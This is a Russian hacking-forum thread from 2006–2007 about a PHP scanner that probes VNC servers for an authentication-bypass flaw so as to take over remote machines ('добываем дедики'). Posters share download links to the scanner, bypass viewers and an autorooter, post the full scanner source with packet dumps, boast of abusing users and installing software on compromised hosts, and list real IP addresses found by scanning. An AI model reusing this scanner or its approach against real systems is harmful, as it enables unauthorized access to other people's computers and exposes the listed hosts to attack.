Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   VNC bypass scanner ( проще говоря " добываем дедики" ) (https://forum.antichat.xyz/showthread.php?t=23819)

gemaglabin 11.09.2006 21:11

VNC bypass scanner ( проще говоря " добываем дедики" )
 
Скрипт для сканирования VNC на уязвимости

Проще говоря VNC чтото вроде remote desktop,или радмина.Штука нешуточная и позволяет насканить много дедиков.

С помощью Bl4ck-vnc-viewer можно приконектится к зараженным хостам. ( milw0rm.com/exploits/1791 )

Если ошибки найдите скажите...

http://www.mytempdir.com/923875

nerezus 11.09.2006 21:52

Да вот только от рута ее не запускают... %)
Да и пароля дефолтного нет, надо при первом запуске задавать.
Да и реализаций разных десятки...

gemaglabin 12.09.2006 18:50

Ну вообщем кто фишку не просек тот мягко говоря сосет ;)

Посканив небольшую сетку я обнаружил несколько бажных VNC сервисов и смог неплохо поглумиться над юзерами + ничего не мешает поставить свой софт.

Формат входных данных - лист из айпи адресов,вида 127.0.0.1-127.0.0.255 нельзя

http://img213.imageshack.us/img213/5894/vncoi0.gif

gemaglabin 15.09.2006 22:37

Нуждаюсь в подобных сплоитах для Vnc демонов

forgotten 18.09.2006 00:53

Кому надо - скрипт для генерации рандомных ip.
http://www.nikitoz.org/gen.php

Генерит ~9000 адрессов.

blackybr 18.09.2006 16:28

ОС : WiNDoWs [ ALL ] *NiX
Описание : Прога для генерирования списков IP адресов
_http://ugas.fatal.ru/releases/IpGenerator.rar

помогло )

Err0r 08.11.2006 19:24

Цитата:

Сообщение от gemaglabin
Ну вообщем кто фишку не просек тот мягко говоря сосет

А может всетаки подскажешь?

KSURi 08.11.2006 20:10

А что подсказать то?
Гемин скрипт ищет бажные внцшки в который возможно обойти авторизацию.
Обход производится с помощью модифицированного клиента внц.
Или тебе тех подробности бага расписать?

Уязвимость до сих пор актуальна. Просто надо правильно выбирать диапозоны для скана.

ЗЫ: во избежание вопросов скажу что если после коннекта у вас появилась виндовая авторизация - ловить там практически нечего.

ЗЗЫ: внц авторутер с сорцами:
http://www.megaupload.com/it/?d=J1X2ETX9

Err0r 09.11.2006 17:31

Цитата:

Сообщение от KSURi
А что подсказать то?
Или тебе тех подробности бага расписать?

Да! ;)
Цитата:

Сообщение от KSURi
Уязвимость до сих пор актуальна. Просто надо правильно выбирать диапозоны для скана.

ну прсканил я сканером 674 компа 114 из них оказались is vulnerable

Цитата:

Сообщение от KSURi
ЗЫ: во избежание вопросов скажу что если после коннекта у вас появилась виндовая авторизация - ловить там практически нечего.

А если такая авторизация*
http://img300.imageshack.us/img300/69/4034xyinnatt6.gif
Цитата:

Сообщение от KSURi
ЗЗЫ: внц авторутер с сорцами:
http://www.megaupload.com/it/?d=J1X2ETX9

Спасибо!

KSURi 09.11.2006 17:54

Цитата:

А если такая авторизация*
Значит сервер патчен.
Цитата:

ну прсканил я сканером 674 компа 114 из них оказались is vulnerable
А я просканил допесты компов и допесты из них vulnerable, что теперь?
Цитата:

Да!
Снифай клиент оригинальный и патченный, потом сравнивай со спецификацией протокола
Цитата:

Спасибо!
Пожалуйста

Err0r 09.11.2006 18:01

KSURi - Спасибо, что разложил по полочкам и резжевал! =) РЕСПЕКТ!

Ksander 09.11.2006 18:16

Перезалейте куда-то, не качает чего-то.

KSURi 09.11.2006 21:07

К сожалению копии геминого скрипта у меня нету, так что:
win: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-win32.rar
nix based: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-linux.tar.gz

Aerot1smo 09.02.2007 00:03

а этот скрипт ещё работает,хочу попробывать надыбать дедиков себе?

Kиt 02.07.2007 09:06

Перезалейте скрипт внс и внц авторутер с сорцами: плиз и какой порт на внц ?

_kREveDKo_ 12.07.2007 00:20

Перезалейте гемин скрипт

ettee 12.07.2007 00:53

Код:

<?php

/**
 Made by gemaglabin ; underwater.cup.su
 Respectz : SkvoznoY,Bug(0)r,ZaCo,FUF,Cash
 #aol on ru.dal.net ; cup.su and antichat.ru
 try to connect vulnerable hosts with Bl4ck-VNC-Viewer
 milw0rm.com/exploits/1791
*/
 
# configure
define ( '_HELLO_PACKET', '524642203030332E3030380A');
set_time_limit(0);
ini_set("display_errors","0");

# loging...
function tpl_process($title,$color)
{
return <<<HTML
 <SCRIPT>
 with(document.getElementById('logarea'))
  {
  str = "$title";
  col = "$color"
  str = '<FONT FACE=TAHOMA><FONT SIZE=2><FONT COLOR=' + col + '>' + str + '</FONT></FONT></FONT>';
  innerHTML += innerHTML ? "<BR>\\n" + str : str;
    scrollTop += 14;
  }
  </SCRIPT>
HTML;
}


# main function
function Scan_Server ($aserver,$aport )
{
 global $fsock;
 $fsock  = fsockopen($aserver,(int) $aport,$errnum,$errstr,2 );
 if ($fsock)
 {
  $res      = false;
  fread( $fsock,10 );
  # sending first packet named hello
  $request  = pack("H*",_HELLO_PACKET);
  fwrite    ( $fsock,$request );
  fread( $fsock,10 );
  # sending second packet where we try to ayth without pass
  $request  = pack("H*","01");
  fwrite    ( $fsock,$request );
  # parsing responce for our auth packet
  $answer = fread( $fsock,10 );
  $answer = unpack("H*",$answer);
  if ($answer[1] = "00000000") $res = true;
  fclose ($fsock);
 }
 return $res;
}
 
 
SENDING HELLO PACKET
0x0000  00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00  .P‹.3T..a[†У..E.
0x0010  00 5E C3 9B 00 00 DE 2F-09 B8 C0 A8 7C 63 0A 0A  .^Г›..Ю/.ёАЁ|c..
0x0020  C8 07 30 81 88 0B 00 3A-12 D6 00 00 38 98 00 00  И.0Ѓ?..:.Ц..8˜..
0x0030  3B 18 FF 03 00 21 45 00-00 36 C3 9A 40 00 DE 06  ;.я..!E..6Гљ@.Ю.
0x0040  0C 8C 0A 07 FF FE 51 38-71 5D 09 BC 17 0C 01 B9  .Њ..яюQ8q].ј...№
0x0050  1A B2 36 C6 DA 55 50 18-FF F3 27 D7 00 00 52 46  .І6ЖЪUP.яу'Ч..RF
0x0060  42 20 30 30 33 2E 30 30-38 0A 0D 0A              B 003.008...
 
 

0x0000  00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00  .P‹.3T..a[†У..E.
0x0010  00 51 DC A8 00 00 DE 2F-F0 B7 C0 A8 7C 63 0A 0A  .QЬЁ..Ю/р·АЁ|c..
0x0020  C8 07 30 81 88 0B 00 2D-12 D6 00 00 3F 8E 00 00  И.0Ѓ?..-.Ц..?Ћ..
0x0030  42 1A FF 03 00 21 45 00-00 29 DC A7 40 00 DE 06  B.я..!E..)Ь§@.Ю.
0x0040  F3 8B 0A 07 FF FE 51 38-71 5D 0A 58 17 0C F3 50  у‹..яюQ8q].X..уP
0x0050  85 8C 0F 43 D7 EF 50 18-FF F1 60 CA 00 00 01      …Њ.CЧпP.яс`К...
 
 

VULNERABLE SERVER
0x0000  00 04 61 5B 86 D3 00 50-8B 0D 33 54 08 00 45 00  ..a[†У.P‹.3T..E.
0x0010  00 54 EC D9 00 00 FA 2F-C4 83 0A 0A C8 07 C0 A8  .TмЩ..ъ/Дѓ..И.АЁ
0x0020  7C 63 30 81 88 0B 00 30-40 00 00 00 42 1B 00 00  |c0Ѓ?..0@...B...
0x0030  3F 8E FF 03 00 21 45 00-00 2C 21 84 40 00 6B 06  ?Ћя..!E..,!„@.k.
0x0040  21 AD 51 38 71 5D 0A 07-FF FE 17 0C 0A 58 0F 43  !*Q8q]..яю...X.C
0x0050  D7 EF F3 50 85 8D 50 18-FF F2 61 C5 00 00 00 00  ЧпуP…ЌP.ятaЕ....
0x0060  00 00                                            ..

 
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE>VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]</TITLE>
<STYLE TYPE="TEXT/CSS">
body{
        overflow: auto;
}

input, select, div {
        font: 11px tahoma, verdana, arial;
}
input.text, select {
        width: 100%;
}
fieldset {
        margin-bottom: 4px;
}

#header {
        font-size: 9px;
        color: white;
        padding: 4px; 
        background-color: #7A96DF; 
        font-family: tahoma;
        text-vertical: center;
}

</STYLE>
</HEAD>

<BODY BGCOLOR=#ECE9D8 TEXT=#000000>
<form name="check" method="post" action="?go">
<div style="background-color: #F4F3EE; margin: auto; border: 1px solid #919B9C; width: 318px;">
<div id="header"> 
<a href="http://cup.su" style="color: white; text-decoration: none; font-weight: bold; background-color: #7A96DF;">
VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]
</a>   
</div>
<div style="background-color: #F4F3EE; width: 300px; font-size:11px; border: 1px solid #919B9C; margin: 4px; padding:4px;">
<td><textarea style="width: 297px; height: 300px; border: 1px solid #919B9C;WRAP:soft;" name="servers"></textarea></td><br><br>
<DIV ID=logarea STYLE="width: 97%; height: 140px; border: 1px solid #7F9DB9; padding: 3px; overflow: auto"></DIV></td>
</tr>
<tr>
<td></td>
<tr>
<td></td>
<br>
<td><input class="text" type="submit" Value="Scan servers" style="width: 299px; margin: auto;"/></td>
</tr>
</tr>
</table>
</div> 
</div>     
</form>
</BODY>

<?php

if (isset($_POST['servers']))
{
 $_servers = $_POST['servers'];
 $servers  = explode("\r\n",$_servers);
 for ($i=0;$i<count($servers);$i++)
 {
  $host = $servers[$i];
  $port = "5900";
  $vuln = Scan_Server($host,$port);
  if (!$vuln) echo tpl_process("<b>$host is not vulnerable</b>","red");
  else echo tpl_process("<b>$host is vulnerable</b>","green");
 }
}

?>


THE_END 02.10.2007 02:12

Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я

212.147.28.150
213.147.108.35
213.177.73.9
213.176.142.73
213.179.6.43
213.192.200.249
213.200.229.57
213.210.5.24
213.210.5.25
213.210.5.14
213.210.5.15
213.210.5.20
213.233.112.69
213.221.55.226

te$t 11.10.2007 20:34

Цитата:

Сообщение от the_end
Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я

212.147.28.150
213.147.108.35
213.177.73.9
213.176.142.73
213.179.6.43
213.192.200.249
213.200.229.57
213.210.5.24
213.210.5.25
213.210.5.14
213.210.5.15
213.210.5.20
213.233.112.69
213.221.55.226

хы дядя, елиб ты пользовался багой примерно год назад,
то наверное тебе бы удалось, чтонидь отловить. А сейчас для добычи дедика нужно перелопатить весь сегмент какой либо страны... К примеру недавно в Австралии поймал пару дедиков W2003. Попробуй приконеткится через метасплоет, у меня иногда прокатывает...

Lancellot 20.10.2007 16:36

Ссорь за тупой вопрос но как запустить этот скрипт,с какими параметрами и что должно быть розришено на шелле?
И как там ставить диапазон?
--
заранее спс


Время: 04:04